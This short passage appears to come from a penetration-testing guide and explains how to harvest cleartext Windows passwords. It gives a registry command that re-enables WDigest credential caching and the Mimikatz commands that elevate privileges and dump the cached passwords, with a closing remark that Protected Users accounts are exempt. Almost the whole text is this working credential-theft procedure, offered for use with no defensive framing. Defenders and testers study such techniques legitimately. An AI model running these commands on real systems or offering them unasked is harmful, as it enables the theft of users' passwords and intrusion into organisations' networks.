The WDigest process caches cleartext passwords for recently logged in users. Or at least it used to. This behavior is disabled on modern Windows systems, but can be re-enabled by a single registry edit:
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1Once this is set, Mimikatz can dump any cleartext passwords that WDigest caches. (Obviously, this only applies to logins made after the registry key above is set.)
privilege::debug
token::elevate
sekurlsa::wdigest
Note that accounts in the “Protected Users” group will not have their credentials cached, even with the above registry hack.